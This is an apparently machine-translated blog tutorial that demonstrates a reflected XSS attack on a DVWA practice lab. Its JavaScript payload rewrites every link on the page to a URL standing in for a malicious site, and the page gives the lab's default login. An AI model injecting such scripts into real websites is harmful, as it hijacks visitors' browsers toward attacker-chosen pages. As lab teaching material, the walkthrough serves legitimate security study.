当前位置:网站首页>XX attack - reflective XSS attack hijacking user browser
XX attack - reflective XSS attack hijacking user browser
2022-07-01 08:08:00 【Cwillchris】
Let's build a reflective XSS The attack jumps to the vulnerable page . In fact, it can also be in DVWA Attack directly in , But we constructed a relatively complex environment for demonstration purposes .
<script>
window.onload = function() {
var link=document.getElementsByTagName("a");
for(j = 0; j < link.length; j++) {
link[j].href="http://www.baidu.com";}
}
</script>
JavaScript The code analysis window.onload When the web page is loaded , perform function Anonymous functions
The functionality :document.getElementsByTagName Gets all of the a label , Store in link Array , Use for The cycle will link Replace all elements in the array with malicious URLs .
open chrome browser , We're in reflex XSS Test the effect
Sign in http://192.168.98.66/DVWA-master/login.php user name : admin password :password , Change it to low Level
边栏推荐
- 软键盘高度报错
- The H5 page has set the font thickness style, but the wechat access style in Huawei mobile phone doesn't take effect?
- Software testing methods and techniques - overview of basic knowledge
- Li Kou daily question - day 31 -202 Happy number
- The Windows C disk is full
- 038 network security JS
- Basic knowledge of MATLAB
- window c盘满了
- [getting started] extract non repeating integers
- How outlook puts together messages with the same discussion
猜你喜欢
038 network security JS
Day5: scanner object, next() and nextline(), sequential structure, selection structure, circular structure
Latex formula code
源代码加密的意义和措施
How outlook puts together messages with the same discussion
Array: question brushing record
如何使用layui将数据库中的数据以表格的形式展现出来
![[redis] it takes you through redis installation and connection at one go](/img/ca/89cb18f0eeb835f021d6a2489681a1.png)
[redis] it takes you through redis installation and connection at one go
OJ输入输出练习
Software testing methods and techniques - overview of basic knowledge
随机推荐
[untitled]
Airsim雷达相机融合生成彩色点云
Latex table
Serial port oscilloscope software ns-scope
[staff] key number (key number identification position | key number marking list | a major key identification principle | F, C, G position marking ascending | F major key identification principle | B
[MySQL learning notes 26] view
5大组合拳,解决校园6大难题,护航教育信息化建设
Php laraver Wechat payment
Access report realizes subtotal function
[dynamic planning] p1020 missile interception (variant of the longest increasing subsequence)
Software testing methods and techniques - overview of basic knowledge
Scala语言学习-07-构造器
2022.6.30 省赛+蓝桥国赛记录
window c盘满了
Li Kou daily question - day 31 -1502 Judge whether an arithmetic sequence can be formed
seaborn clustermap矩阵添加颜色块
AArdio - 【问题】bass库回调时内存增长的问题
Wang Yingqi, founder of ones, talks to fortune (Chinese version): is there any excellent software in China?
Transaction method call @transactional
How to check ad user information?